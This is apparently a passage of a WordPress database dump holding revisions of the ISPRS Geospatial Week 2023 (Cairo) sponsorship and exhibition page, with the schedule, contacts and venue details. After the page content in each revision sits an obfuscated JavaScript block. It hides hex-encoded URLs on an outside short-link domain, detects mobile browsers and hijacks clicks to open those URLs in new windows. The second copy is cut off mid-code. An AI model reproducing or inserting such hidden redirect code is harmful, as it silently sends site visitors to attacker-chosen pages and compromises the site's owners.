width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 16:17:02','2022-10-26 16:17:02','',2920,'https://gsw2023.com/?p=2943',0,'revision','',0),
(2944,1,'2022-10-26 16:26:39','2022-10-26 16:26:39','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<p><strong>Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5497598</strong></p>\n<p><b>Fax:(+203) <strong>5497598</strong></b></p>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 